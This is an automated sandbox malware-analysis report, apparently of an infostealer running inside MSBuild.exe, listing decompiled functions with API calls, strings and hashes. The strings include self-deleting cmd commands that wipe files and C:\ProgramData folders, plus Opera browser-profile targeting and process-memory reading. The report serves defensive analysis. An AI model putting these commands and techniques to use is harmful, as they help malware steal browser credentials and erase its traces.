
Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$Window$MessageProcess$AllocByteCharClassContextConvertCountCriticalDefaultDialogErrorFreeHelpLastLocaleLongMultiRegisterSectionSpinVisibleWide
String ID:
API String ID: 3627164727-0
Opcode ID: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction ID: 597bc7deab9f95c5419af2560a3a18d661806b2e942c9da5f2f727d66e905f75
Opcode Fuzzy Hash: 90e2bc38f92fcaff424a9cbc551a6a023065eacd9b594e7e38103360e1463183
Instruction Fuzzy Hash: 17014672402824FBC7156BA1BD6DDDF3E7CEE4A3527141265F60A910608B794A01CBFE

Function 0042672D Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 64COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 00426754
_free.LIBCMT ref: 00426762
_free.LIBCMT ref: 0042676D
_free.LIBCMT ref: 00426741

Part of subcall function 0041DA5B: HeapFree.KERNEL32(00000000,00000000,?,0041D2A3,00000000,0043B7AC,0041D2EA,0040EEBE,?,?,0041D3D4,0043B7AC,?,?,0042ED58,0043B7AC), ref: 0041DA71
Part of subcall function 0041DA5B: GetLastError.KERNEL32(?,?,?,0041D3D4,0043B7AC,?,?,0042ED58,0043B7AC,?,?,?), ref: 0041DA83

___free_lc_time.LIBCMT ref: 0042678B
_free.LIBCMT ref: 00426796
_free.LIBCMT ref: 004267BB
_free.LIBCMT ref: 004267D2
_free.LIBCMT ref: 004267E1

Strings

xLC, xrefs: 0042677B

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _free$ErrorFreeHeapLast___free_lc_time
String ID: xLC
API String ID: 3704779436-381350105
Opcode ID: 75c8617aa577018b802f999097e256e29a76f75524ffb918136c170e5bfc19f7
Instruction ID: 3a25437d7ba4b5db782e2d0491041096a79b2f5d500c154d40e95b3c30946f3d
Opcode Fuzzy Hash: 75c8617aa577018b802f999097e256e29a76f75524ffb918136c170e5bfc19f7
Instruction Fuzzy Hash: 48118FB2A04712DBDB20EF65F885B9A73E5AF81359F55493FE10897241CB3CAC84CB18

Function 0041BAA4 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 175fileCOMMON

Download Yara Rule

APIs

GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041BAD8
GetFileSize.KERNEL32(?,00000000), ref: 0041BB51
SetFilePointer.KERNEL32(?,00000000,00000000,00000000), ref: 0041BB6D
ReadFile.KERNEL32(?,?,00000002,?,00000000), ref: 0041BB81
SetFilePointer.KERNEL32(?,00000024,00000000,00000000), ref: 0041BB8A
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BB9A
SetFilePointer.KERNEL32(?,?,00000000,00000000), ref: 0041BBB8
ReadFile.KERNEL32(?,?,00000004,?,00000000), ref: 0041BBC8

Strings

, xrefs: 0041BB24

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$PointerRead$HandleInformationSize
String ID:
API String ID: 2979504256-3916222277
Opcode ID: b93520a0e31e70c5fcafbd99113cd43e56b40bfe3ff6e632537e59c659fb1c6e
Instruction ID: cb892b0c559bbcf0e4207802013ae1cf0d61ca8ae93d0e0fc4d1a3101aeab4e7
Opcode Fuzzy Hash: b93520a0e31e70c5fcafbd99113cd43e56b40bfe3ff6e632537e59c659fb1c6e
Instruction Fuzzy Hash: E951F471D00218AFDB18DF99DC85AEEBBB9EF04304F10442AE511E6660D738AD85CF94

Function 00418381 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 132COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004183A6
_memset.LIBCMT ref: 004183B5
_memset.LIBCMT ref: 00418575
_memset.LIBCMT ref: 00418587

Strings

" & exit, xrefs: 00418499
" & rd /s /q "C:\ProgramData\, xrefs: 00418443
/c timeout /t 10 & del /f /q ", xrefs: 004183F5
/c timeout /t 10 & rd /s /q "C:\ProgramData\, xrefs: 004184A0
" & exit, xrefs: 004184EA

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset
String ID: " & exit$" & exit$" & rd /s /q "C:\ProgramData\$/c timeout /t 10 & del /f /q "$/c timeout /t 10 & rd /s /q "C:\ProgramData\
API String ID: 2102423945-1079830800
Opcode ID: e286fd93b08e4a18dfef94903c3e9d688eebfe5aa50bc46730d0cd5ef8038a27
Instruction ID: 2c77cb5680fdc6ddbc4f3b9c6c2dd7c8d8e6f6f770fdddae2c6db266beba6389
Opcode Fuzzy Hash: e286fd93b08e4a18dfef94903c3e9d688eebfe5aa50bc46730d0cd5ef8038a27
Instruction Fuzzy Hash: EB51BDB1E402299BCF21EF65CD416DDB3BCAB44708F4104EAA618B3151DB786FC68E58

Function 0041FA62 Relevance: 14.1, APIs: 3, Strings: 5, Instructions: 77COMMON

Download Yara Rule

APIs

UnDecorator::getArgumentList.LIBCMT ref: 0041FA87

Part of subcall function 0041F622: Replicator::operator[].LIBCMT ref: 0041F6A5
Part of subcall function 0041F622: DName::operator+=.LIBCMT ref: 0041F6AD

DName::operator+.LIBCMT ref: 0041FAE0
DName::DName.LIBCMT ref: 0041FB38

Strings

..., xrefs: 0041FB1B, 0041FB27
void, xrefs: 0041FB30
<ellipsis>, xrefs: 0041FB22
,<ellipsis>, xrefs: 0041FAD3
,..., xrefs: 0041FACC, 0041FAD8

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: ArgumentDecorator::getListNameName::Name::operator+Name::operator+=Replicator::operator[]
String ID: ,...$,<ellipsis>$...$<ellipsis>$void
API String ID: 834187326-2211150622
Opcode ID: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction ID: 6b38829ecadea6215c8f6510e569e1b7c44c0c93244dcadd2c287e51603536b5
Opcode Fuzzy Hash: d3ab2409594bd746038f666c063a4042a3e3f6ffbbc6970485e0b6f7108b7cf3
Instruction Fuzzy Hash: 72217130601208AFCB11DF5CD4549AA7BB4EF4538AB54806AE845CB362E738E987CB4C

Function 004213FB Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 55COMMON

Download Yara Rule

APIs

UnDecorator::UScore.LIBCMT ref: 00421405
DName::DName.LIBCMT ref: 00421411

Part of subcall function 0041F0DC: DName::doPchar.LIBCMT ref: 0041F10D

UnDecorator::getScopedName.LIBCMT ref: 00421450
DName::operator+=.LIBCMT ref: 0042145A
DName::operator+=.LIBCMT ref: 00421469
DName::operator+=.LIBCMT ref: 00421475
DName::operator+=.LIBCMT ref: 00421482

Strings

void, xrefs: 00421461

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Name::operator+=$Name$Decorator::Decorator::getName::Name::doPcharScopedScore
String ID: void
API String ID: 1480779885-3531332078
Opcode ID: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction ID: 57a596a2ca760a273274528444675b4bf9d61aebdbb2dca40c7be891dda90938
Opcode Fuzzy Hash: 4593ccc2295a5eef351ee994040e2c1cea314195fe000b448df242ee6b74f299
Instruction Fuzzy Hash: B811C671A00218AFD714FF68D856BE97B60AF20305F44409BE4069B2F2DB78DA86CB49

Function 0040BF4D Relevance: 12.7, APIs: 3, Strings: 4, Instructions: 420COMMON

Download Yara Rule

APIs

StrCmpCA.SHLWAPI(?,Opera,00436843,00436842,00436837,00436836,00436833,00436832,0043682F), ref: 0040C08B
StrCmpCA.SHLWAPI(?,Opera GX), ref: 0040C099
StrCmpCA.SHLWAPI(?,Opera Crypto), ref: 0040C0A7

Strings

Opera Crypto, xrefs: 0040C09F
\*.*, xrefs: 0040BF73
Opera, xrefs: 0040C083
Opera GX, xrefs: 0040C091

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID:
String ID: Opera$Opera Crypto$Opera GX$\*.*
API String ID: 0-1710495004
Opcode ID: cd45a82cdec32a0644e9fc934847dcd5132f8985d98157332d9820e1aa53d843
Instruction ID: 0260d5c266de210f65568f4b73986d2e2321fdcb1199aff99a3b39d86c03169e
Opcode Fuzzy Hash: cd45a82cdec32a0644e9fc934847dcd5132f8985d98157332d9820e1aa53d843
Instruction Fuzzy Hash: F4021C71A401299BCF21FB26DD466CD7775AF14308F4111EAB948B3192DBB86FC98F88

Function 0040FB2D Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 159COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00064000,?,?,?), ref: 0040FB52
OpenProcess.KERNEL32(001FFFFF,00000000,00000000), ref: 0040FB7E
_memset.LIBCMT ref: 0040FBC1
??_V@YAXPAX@Z.MSVCRT(?), ref: 0040FD17

Part of subcall function 0040F030: _memmove.LIBCMT ref: 0040F04A

Strings

N0ZWFt, xrefs: 0040FC7E

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: OpenProcess_memmove_memset
String ID: N0ZWFt
API String ID: 2647191932-431618156
Opcode ID: 5f62aa5b6abcaa0ca0cbb89d9b96bb4e1aae85ed0061038e1d2274415a3f45d9
Instruction ID: 446351bc283c4762e53d247ac54b49bb6219315ee7fac77137ec1a6eb046dabb
Opcode Fuzzy Hash: 5f62aa5b6abcaa0ca0cbb89d9b96bb4e1aae85ed0061038e1d2274415a3f45d9
Instruction Fuzzy Hash: 4A5191B1D0022C9FDB309F54DC85BDDB7B8AB44308F0001FAA609B7692D6796E898F59

Function 0040F915 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 139COMMON

Download Yara Rule

APIs

??_U@YAPAXI@Z.MSVCRT(00000000,?,00000000,00000000,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040F934
VirtualQueryEx.KERNEL32(?,00000000,?,0000001C,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000), ref: 0040F95E
ReadProcessMemory.KERNEL32(?,00000000,?,00064000,00000000,?,?,?,?,?,?,?,?), ref: 0040F9AB
ReadProcessMemory.KERNEL32(?,00000000,?,?,00000000,?,?,?,?,?,?,?,?), ref: 0040FA04
VirtualQueryEx.KERNEL32(?,?,?,0000001C), ref: 0040FA5C
??_V@YAXPAX@Z.MSVCRT(?,?,?,?,?,?,?,?,?,0040FBE3,?,00000000,00000000,?,?), ref: 0040FA6D

Strings

@, xrefs: 0040F977

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: MemoryProcessQueryReadVirtual
String ID: @
API String ID: 3835927879-2766056989
Opcode ID: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction ID: 782d1e78530d26aac93c20cf39dad9713f636d1ba6f6d7f846141922d26d4ee5
Opcode Fuzzy Hash: a9495d4f72b3d1438dfa2c68789035a7ae4ab924da08034bdec0029a689f928b
Instruction Fuzzy Hash: B8419D32A00209BBDF209FA5DC49FDF7B76EF44760F14803AFA04A6690D7788A55DB94

Function 0041260C Relevance: 10.7, APIs: 3, Strings: 3, Instructions: 204synchronizationCOMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 004127B1
_memset.LIBCMT ref: 004128B7
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00412932

Strings

EMPTY, xrefs: 0041283A
.exe, xrefs: 0041264F
af641acce3f8c85bf2490a9b3aa972c5, xrefs: 004127DB

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset$ObjectSingleWait
String ID: .exe$EMPTY$af641acce3f8c85bf2490a9b3aa972c5
API String ID: 12478032-2745533388
Opcode ID: 750546415860910891eec85b0912701edd85bbb488ea7fafddc03ecc979db47c
Instruction ID: 304a4236ee7f0de4f144c20be59e76cfc50544f1b2deb0a0f06e66ba437c67be
Opcode Fuzzy Hash: 750546415860910891eec85b0912701edd85bbb488ea7fafddc03ecc979db47c
Instruction Fuzzy Hash: E9814FB2E50129ABCF11EF61DD46ACE7379AB04309F4054BAB708B3051D679AFC98F58

Function 0040DB7F Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 109stringCOMMON

Download Yara Rule

APIs

lstrlenA.KERNEL32(?,75AA5460,?,00000000), ref: 0040DBBB
strchr.MSVCRT ref: 0040DBCD
strchr.MSVCRT ref: 0040DBF2
lstrlenA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040DCF7), ref: 0040DC14
strcpy_s.MSVCRT ref: 0040DC6F

Strings

0123456789ABCDEF, xrefs: 0040DB99

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: lstrlenstrchr$strcpy_s
String ID: 0123456789ABCDEF
API String ID: 1957064729-2554083253
Opcode ID: d7f8adf961633c923ded35c4b7c571d3f1c689bf508e1cbb2af2f09870105798
Instruction ID: 06d15f49a8eb9cf9066e179aa7ea4312028ee3a66f1e5adc80d081fb3659f8e0
Opcode Fuzzy Hash: d7f8adf961633c923ded35c4b7c571d3f1c689bf508e1cbb2af2f09870105798
Instruction Fuzzy Hash: 4A315D72D002199FDB00DFE8DC49ADEBBB9AF09355F100179E901FB281DB79A909CB94

Function 0041FB42 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 50COMMON

Download Yara Rule

APIs

DName::DName.LIBCMT ref: 0041FB8B
DName::operator+.LIBCMT ref: 0041FB92
DName::DName.LIBCMT ref: 0041FBB4
DName::operator+.LIBCMT ref: 0041FBBB
DName::operator+.LIBCMT ref: 0041FBC2

Strings

throw(, xrefs: 0041FB83, 0041FBAC

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Name::operator+$NameName::
String ID: throw(
API String ID: 168861036-3159766648
Opcode ID: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction ID: ba1955fdff4c252f9a606c57b8f1c9a48ddf06d7b75bf01b8414d0fb9b5eadfe
Opcode Fuzzy Hash: acf3c3f6b62bbe0bf60cea1499b19d7b2d2c206c409909a41351c69a4c2d4579
Instruction Fuzzy Hash: E4015B34600209EFCF04DF64D856DED7BB5EF44749F50407AF50597292DA78EA8AC748

Function 004135A8 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 262stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004135EA
strtok_s.MSVCRT ref: 0041398F

Strings

true, xrefs: 004136A6
zA, xrefs: 004139B4
false, xrefs: 004136C5

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: false$true$zA
API String ID: 3330995566-752889570
Opcode ID: 266bee341c7ceb3c75019c964d133af86dd942388cf45366b56daf47d7fe114c
Instruction ID: f88d8e482521469d959c87b5d2553cfe3082ffd239838e960e1cb591ae3ba6ed
Opcode Fuzzy Hash: 266bee341c7ceb3c75019c964d133af86dd942388cf45366b56daf47d7fe114c
Instruction Fuzzy Hash: 37B16DB5900218ABCF64EF55DC89ACA77B5BF18305F0001EAE549A7261EB75AFC4CF48

Function 0041C0D9 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 98timeCOMMON

Download Yara Rule

APIs

SetFilePointer.KERNEL32(?,00000000,00000000,00000001,74DE83C0,00000000,?,?,?,?,?,?,0041C6A2,?,00417037,?), ref: 0041C12C
SetFilePointer.KERNEL32(?,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,0041C6A2,?,00417037), ref: 0041C15C
GetLocalTime.KERNEL32(?,?,?,?,?,?,?,0041C6A2,?,00417037,?), ref: 0041C188
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,?,0041C6A2,?,00417037,?), ref: 0041C196

Part of subcall function 0041BAA4: GetFileInformationByHandle.KERNEL32(?,?,00000000,?,?), ref: 0041BAD8

Strings

7pA, xrefs: 0041C0E9

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: File$Time$Pointer$HandleInformationLocalSystem
String ID: 7pA
API String ID: 3986731826-4034994935
Opcode ID: 67e2672ab753ca4f37cc9b7268c95e0e1104df219937840ae09d8f1390f1a5d2
Instruction ID: a03e18f876bb7c6bb95fa29af4f0117ab82ea060c0d505197b56aaa6882e86ab
Opcode Fuzzy Hash: 67e2672ab753ca4f37cc9b7268c95e0e1104df219937840ae09d8f1390f1a5d2
Instruction Fuzzy Hash: 97415971900209EBCF15DF69CC80ADEBBF8FF48310F10426AE854EA266D7349985CFA4

Function 0040F2B1 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F2C7

Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0

std::_Xinvalid_argument.LIBCPMT ref: 0040F2E6
_memmove.LIBCMT ref: 0040F320

Strings

string too long, xrefs: 0040F2E1
invalid string position, xrefs: 0040F2C2

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8Throw_memmove
String ID: invalid string position$string too long
API String ID: 3404309857-4289949731
Opcode ID: 585f722b960d61c8edb6e887eede1a8e5c7a6d662bb162e141d0d5ca5504c1c1
Instruction ID: 8d1b4f359d452bc0139d647030d3afcb4c777ebb34d0dc45517a8c2f57a5c6cf
Opcode Fuzzy Hash: 585f722b960d61c8edb6e887eede1a8e5c7a6d662bb162e141d0d5ca5504c1c1
Instruction Fuzzy Hash: 4C11E071300202AFCB24EF2DD981A59B3A5BF41324754053AF805EBAC2C778ED598799

Function 00425833 Relevance: 7.6, APIs: 5, Instructions: 68COMMONLIBRARYCODE

Download Yara Rule

APIs

malloc.MSVCRT ref: 00425841
_free.LIBCMT ref: 00425854

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _freemalloc
String ID:
API String ID: 3576935931-0
Opcode ID: 641b289af0baeaab8b9a5171f60c0491d104b74c17f1ced00544f24bd9ae676e
Instruction ID: 935c43270f4d77db60209791427c9bc320832430a8ecb60128fe957c4bbf0321
Opcode Fuzzy Hash: 641b289af0baeaab8b9a5171f60c0491d104b74c17f1ced00544f24bd9ae676e
Instruction Fuzzy Hash: 1511EB32B04A35ABCF217F36BC0475A37A4AF403A5F60443BF948DB251DA7CC99186AC

Function 00426839 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 00426845

Part of subcall function 00424A74: __getptd_noexit.LIBCMT ref: 00424A77
Part of subcall function 00424A74: __amsg_exit.LIBCMT ref: 00424A84

__getptd.LIBCMT ref: 0042685C
__amsg_exit.LIBCMT ref: 0042686A
__lock.LIBCMT ref: 0042687A
__updatetlocinfoEx_nolock.LIBCMT ref: 0042688E

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction ID: 17361057c0d52ffbfdd5451dd0703f081e16a6d4bb330f32ad13174130427518
Opcode Fuzzy Hash: 4402fd7a9f35548a0a6e406088b1ac9e9fe92c8952a9fc7886658e1653cea504
Instruction Fuzzy Hash: E7F09676F417309AD621BB7A7403B5E76A0AF00769F92425FF4106A2D2CF6C9980CA5D

Function 0040826D Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 128COMMON

Download Yara Rule

APIs

_memset.LIBCMT ref: 00408307

Strings

v20, xrefs: 00408286
v10, xrefs: 004082CE
ERROR_RUN_EXTRACTOR, xrefs: 004082BE

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: _memset
String ID: ERROR_RUN_EXTRACTOR$v10$v20
API String ID: 2102423945-380572819
Opcode ID: c583a5af4eabbf2f1e55903ac08c2fc38dd49fb6c7cace8cd31f54493459c540
Instruction ID: 4271a2f96582835c92d1499e44d2f9be6f2f81c30510370fac18fcb9411d570f
Opcode Fuzzy Hash: c583a5af4eabbf2f1e55903ac08c2fc38dd49fb6c7cace8cd31f54493459c540
Instruction Fuzzy Hash: 5541B3B2A00108ABCF10DFA5CD42ADE7BB8AB84714F15413BFD40F7280EB78D9458B99

Function 004139C2 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 127stringCOMMON

Download Yara Rule

APIs

strtok_s.MSVCRT ref: 004139F3
strtok_s.MSVCRT ref: 00413B34

Strings

block, xrefs: 004139CB
TxA, xrefs: 004139EC, 004139EF

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: strtok_s
String ID: TxA$block
API String ID: 3330995566-2373637923
Opcode ID: 0968e0b0628705e8ac1d29d17911e38a67c685f80fe145dba11dcdbcfe66eece
Instruction ID: 9e2abf34b02cddae1b0fa04c6dc88f1d30775994422634f8dc56bb1647053282
Opcode Fuzzy Hash: 0968e0b0628705e8ac1d29d17911e38a67c685f80fe145dba11dcdbcfe66eece
Instruction Fuzzy Hash: 7B414F70A48306BBEB44DF60DC49E9A7B6CFB1870BB206166E402D2151FB39B781DB58

Function 00410077 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 93COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0041009A

Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED2D
Part of subcall function 0042ED18: __CxxThrowException@8.LIBCMT ref: 0042ED42
Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED53

__EH_prolog3_catch.LIBCMT ref: 00410139
std::_Xinvalid_argument.LIBCPMT ref: 0041014D

Strings

vector<T> too long, xrefs: 00410095, 00410148

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Xinvalid_argumentstd::_std::exception::exception$Exception@8H_prolog3_catchThrow
String ID: vector<T> too long
API String ID: 2448322171-3788999226
Opcode ID: 1419926136d60580067ac53f468ac34c9755c723ec9afb86ab4f57807058201c
Instruction ID: 755d422b0406570ec1b1ca0bb8a9fc170e0e76cf90744f0537cefae681ccfb55
Opcode Fuzzy Hash: 1419926136d60580067ac53f468ac34c9755c723ec9afb86ab4f57807058201c
Instruction Fuzzy Hash: 6331B632B503269BDB18EF69AC456EE77E29705311F51106FE520E7290D6BE9EC08B88

Function 0040F27D Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 21COMMON

Download Yara Rule

APIs

std::_Xinvalid_argument.LIBCPMT ref: 0040F282

Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED2D
Part of subcall function 0042ED18: __CxxThrowException@8.LIBCMT ref: 0042ED42
Part of subcall function 0042ED18: std::exception::exception.LIBCMT ref: 0042ED53

std::_Xinvalid_argument.LIBCPMT ref: 0040F28D

Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042ED7A
Part of subcall function 0042ED65: __CxxThrowException@8.LIBCMT ref: 0042ED8F
Part of subcall function 0042ED65: std::exception::exception.LIBCMT ref: 0042EDA0

Strings

string too long, xrefs: 0040F27D
invalid string position, xrefs: 0040F288

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: std::exception::exception$Exception@8ThrowXinvalid_argumentstd::_
String ID: invalid string position$string too long
API String ID: 1823113695-4289949731
Opcode ID: be79a2a7e9aaca69112733cb54712ed9ea9badf19c2d7797a33f7b9a263133be
Instruction ID: 277dc4e046663c8ecaa9b12b995e3b45fe52676ed53db3f7bdcff30859ae9fca
Opcode Fuzzy Hash: be79a2a7e9aaca69112733cb54712ed9ea9badf19c2d7797a33f7b9a263133be
Instruction Fuzzy Hash: 31D0C2B565020CBBCB04E7AAE8069CDB6E89F48700F20016BE700E3241EA7456004559

Function 00411D61 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 18memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,00412301,?), ref: 00411D6C
HeapAlloc.KERNEL32(00000000), ref: 00411D73
wsprintfW.USER32 ref: 00411D84

Strings

%hs, xrefs: 00411D7E

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction ID: 516a0af99a9d3ed9a850d6bfca40a0a85ae49b58000b6b42a5d70a6c01262027
Opcode Fuzzy Hash: 3ad6661e342435e3454c6033efd35680c758cdf589e793b7d7a2c9c560a2e302
Instruction Fuzzy Hash: F2D0A73134031477C61027D4BC0DF9A3F2CDB067A2F001130FA0DD6151C96548144BDD

Function 004013F6 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 15COMMON

Download Yara Rule

APIs

CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00401402
GetDeviceCaps.GDI32(00000000,0000000A), ref: 0040140D
ReleaseDC.USER32(00000000,00000000), ref: 00401416

Strings

DISPLAY, xrefs: 004013FD

Memory Dump Source

Source File: 00000003.00000002.1980647487.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_400000_MSBuild.jbxd

Yara matches

Similarity

API ID: CapsCreateDeviceRelease
String ID: DISPLAY
API String ID: 1843228801-865373369
Opcode ID: 6d8e34817c800d656530c1e8e523df0c20ac1b926281776ce52baa48a7045e34
Instruction ID: 36e3823ee53bced430e70f0d048e6716cdaf6b37fc8da0c0fd181c1dc0393a61
Opcode Fuzzy Hash: 6d8e34817c800d656530c1e8e523df0c20ac1b926281776ce52baa48a7045e34
